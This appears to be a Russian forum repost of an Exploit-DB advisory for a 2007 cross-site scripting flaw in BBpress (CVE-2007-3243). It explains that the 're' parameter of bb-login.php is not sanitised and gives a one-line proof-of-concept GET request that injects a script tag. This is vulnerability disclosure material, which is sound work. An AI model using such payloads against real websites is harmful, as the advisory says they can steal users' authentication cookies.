- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30175
- Проверка EDB
-
- Пройдено
- Автор
- ORY SEGAL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3243
- Дата публикации
- 2007-06-11
Код:
source: https://www.securityfocus.com/bid/24422/info
BBpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
GET /bb-login.php?re="><script>alert(1);</script> HTTP/1.0 Host: www.some.site Referer: http://www.some.site/
- Источник
- www.exploit-db.com